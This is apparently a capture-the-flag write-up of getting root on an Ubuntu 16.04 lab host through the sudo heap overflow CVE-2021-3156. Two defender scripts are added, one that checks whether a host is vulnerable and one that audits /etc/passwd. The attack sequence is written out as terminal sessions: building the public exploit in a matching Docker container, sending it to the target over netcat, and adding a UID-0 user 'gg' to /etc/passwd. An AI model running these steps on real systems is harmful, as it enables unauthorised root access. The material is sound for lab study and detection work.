CVE-2021-3156


PEAS has flagged the target system as vulnerable to CVE-2021-3156.

A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software) and has been rated as critical. The issue affects the function sudoers_policy_main: manipulation with an unknown input leads to a heap-based overflow, classified under CWE-122. A heap overflow is a buffer overflow in which the overwritten buffer lives in the heap portion of memory, generally meaning it was allocated with a routine such as malloc(). Confidentiality, integrity, and availability are all impacted.
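Before running anything on the target, a defender wants a quick way to tell whether a given sudo build is affected. The following script is an added example, not part of this write-up or of the PEAS tooling. It combines two signals: the upstream affected ranges from the sudo advisory (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1), and the `sudoedit -s /` probe the advisory documents, where a vulnerable build answers with an error starting `sudoedit:` and a patched build prints its usage text. The function names (`parse_version`, `upstream_vulnerable`, `classify_sudoedit_output`, `check_local_sudo`) are my own.

```python
"""Added example (not from the write-up): a defender-side triage check for
CVE-2021-3156 ("Baron Samedit").

Caveat: distribution packages backport the fix while keeping the old upstream
version string (the Ubuntu 16.04 target in this write-up ships sudo 1.8.16),
so the version comparison alone over-reports on patched hosts. Treat it as
triage and confirm with the sudoedit probe or the distro advisory.
"""
import re
import subprocess
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, p-level)

# Upstream ranges listed as affected in the sudo advisory, inclusive.
VULNERABLE_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

# Matches "1.8.31", "1.8.31p2", or the first line of `sudo --version`
# ("Sudo version 1.8.31p2").
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_version(text: str) -> Optional[Version]:
    """Extract a comparable 4-tuple from a sudo version string, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return int(major), int(minor), int(patch), int(plevel or 0)


def upstream_vulnerable(version_text: str) -> Optional[bool]:
    """True if the upstream version falls in an affected range, None if unparseable."""
    v = parse_version(version_text)
    if v is None:
        return None
    return any(low <= v <= high for low, high in VULNERABLE_RANGES)


def classify_sudoedit_output(first_line: str) -> str:
    """Classify the first stderr line of `sudoedit -s /` per the sudo advisory."""
    line = first_line.strip()
    if line.startswith("sudoedit:"):
        return "vulnerable"   # e.g. "sudoedit: /: not a regular file"
    if line.startswith("usage:"):
        return "patched"      # the -s flag is rejected before anything else runs
    return "unknown"


def check_local_sudo(timeout: float = 5.0) -> Dict[str, Optional[str]]:
    """Run both checks on the current host (both commands print to stderr/stdout
    without elevating privileges). Returns a dict of results."""
    result: Dict[str, Optional[str]] = {"version": None, "upstream_range": None, "probe": None}
    try:
        ver = subprocess.run(["sudo", "--version"], capture_output=True,
                             text=True, timeout=timeout, stdin=subprocess.DEVNULL)
        first = ver.stdout.splitlines()[0] if ver.stdout else ""
        result["version"] = first
        vuln = upstream_vulnerable(first)
        result["upstream_range"] = None if vuln is None else ("affected" if vuln else "not affected")

        probe = subprocess.run(["sudoedit", "-s", "/"], capture_output=True,
                               text=True, timeout=timeout, stdin=subprocess.DEVNULL)
        first_err = probe.stderr.splitlines()[0] if probe.stderr else ""
        result["probe"] = classify_sudoedit_output(first_err)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        pass  # sudo not installed or hung: leave the remaining fields as None
    return result


if __name__ == "__main__":
    for key, value in check_local_sudo().items():
        print(f"{key}: {value}")
```

On a fleet, the version half of this is the part that fits into an inventory query; the probe is the part to run on a handful of hosts when the package version is ambiguous.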

Exploit


Exploit found online

skyfuck@ubuntu:/dev/shm$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
skyfuck@ubuntu:/dev/shm$ cc
The program 'cc' can be found in the following packages:
 * gcc
 * clang
 * tcc
Ask your administrator to install one of them

No compiler is installed on the target system, so the exploit is compiled off-target in a matching environment and transferred over instead.

Docker Exploit Development


┌──(kali㉿kali)-[~/archive/thm/tomghost]
└─$ docker run -it --entrypoint "/bin/bash" --name tomghost ubuntu:16.04
 
root@e7d4383510fe:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Setting up the Docker container to match the target environment: Ubuntu 16.04 with ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23.

root@e7d4383510fe:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git wget -y ; cd root

Installing the necessary packages

root@e7d4383510fe:~# git clone https://github.com/worawit/CVE-2021-3156 ; cd CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 86 (delta 16), reused 11 (delta 11), pack-reused 68
Unpacking objects: 100% (86/86), done.
Checking connectivity... done.

Cloning the exploit repository

root@e7d4383510fe:~/CVE-2021-3156# gcc -O2 -o exploit_timestamp_race exploit_timestamp_race.c -ldl
exploit_timestamp_race.c: In function 'main':
exploit_timestamp_race.c:325:2: warning: ignoring return value of 'chdir', declared with attribute warn_unused_result [-Wunused-result]
  chdir("/");
  ^
exploit_timestamp_race.c:326:2: warning: ignoring return value of 'system', declared with attribute warn_unused_result [-Wunused-result]
  system("echo gg | su -c \"cp "BACKUP_FILE " " PASSWD_FILE ";rm -rf " WORKING_DIR "\" - gg ");
  ^
 
root@e7d4383510fe:~# tar -czf CVE-2021-3156.tar.gz CVE-2021-3156

Compiling the exploit and packaging the repository as a tarball for transfer

Exploitation


root@e7d4383510fe:~# nc 10.10.198.73 2222 < CVE-2021-3156.tar.gz
 
skyfuck@ubuntu:/dev/shm$ nc -nlvp 2222 > CVE-2021-3156.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.9.2.95] port 2222 [tcp/*] accepted (family 2, sport 36054)
skyfuck@ubuntu:/dev/shm$ tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156

Delivery complete

skyfuck@ubuntu:/dev/shm/CVE-2021-3156$ python3 ./exploit_userspec.py
 
[...REDACTED...]
 
offset to first userspec: 0x370
 
cmnd size: 0x1230
offset to defaults: 0x60
offset to first userspec: 0x370
offset to userspec: 0x0
 
to skip finding offsets next time no this machine, run: 
./exploit_userspec.py 0x1230 0x60 0x370 0x0
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
success at 858

Exploitation successful
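The exploit's success line shows what it leaves behind: a new entry in /etc/passwd for a user with UID 0 and a password hash stored directly in the password field rather than in /etc/shadow. Both are things a defender can audit for. The script below is an added example, not part of the write-up or the exploit repository; the sample passwd content is constructed (with a placeholder hash), and the function names `audit_passwd_lines` and `audit_passwd_file` are my own.

```python
"""Added example (not from the write-up): audit a passwd file for the
artefacts a successful CVE-2021-3156 run of this kind leaves behind.

Findings raised:
  * an account other than root with UID 0
  * a password field holding a hash (or empty) instead of 'x' / a lock marker
  * malformed lines that do not have the seven expected fields
"""
from typing import List, Tuple

Finding = Tuple[int, str, str]  # (line number, account name, description)

# Constructed sample mirroring the shape of the exploit's output above.
# The hash value is a placeholder, not a real digest.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
skyfuck:x:1001:1001::/home/skyfuck:/bin/bash
gg:$5$salt$CONSTRUCTED_PLACEHOLDER_HASH:0:0:gg:/root:/bin/bash
"""

# Values that legitimately appear in the passwd password field.
_SHADOWED = "x"
_LOCKED = ("*", "!", "!!")


def audit_passwd_lines(lines: List[str]) -> List[Finding]:
    """Scan passwd-format lines and return a list of findings (empty if clean)."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(lines, start=1):
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((lineno, name, "non-numeric UID"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
        if pw == "":
            findings.append((lineno, name, "empty password field (passwordless login)"))
        elif pw != _SHADOWED and pw not in _LOCKED:
            findings.append((lineno, name, "password hash stored in passwd instead of shadow"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> List[Finding]:
    """Convenience wrapper: audit a passwd file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd_lines(fh.readlines())


if __name__ == "__main__":
    for lineno, name, what in audit_passwd_lines(SAMPLE_PASSWD.splitlines()):
        print(f"line {lineno}: {name}: {what}")
```

Run `audit_passwd_file()` from a cron job or a file-integrity hook so a new UID 0 account surfaces in minutes rather than at the next manual review; pairing it with an inotify or auditd watch on /etc/passwd catches the write itself.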

skyfuck@ubuntu:/dev/shm/CVE-2021-3156$ su gg
Password: 
root@ubuntu:/dev/shm/CVE-2021-3156# whoami
root
root@ubuntu:/dev/shm/CVE-2021-3156# hostname
ubuntu
root@ubuntu:/dev/shm/CVE-2021-3156# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:e6:f7:17:b3:d5 brd ff:ff:ff:ff:ff:ff
    inet 10.10.198.73/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::e6:f7ff:fe17:b3d5/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise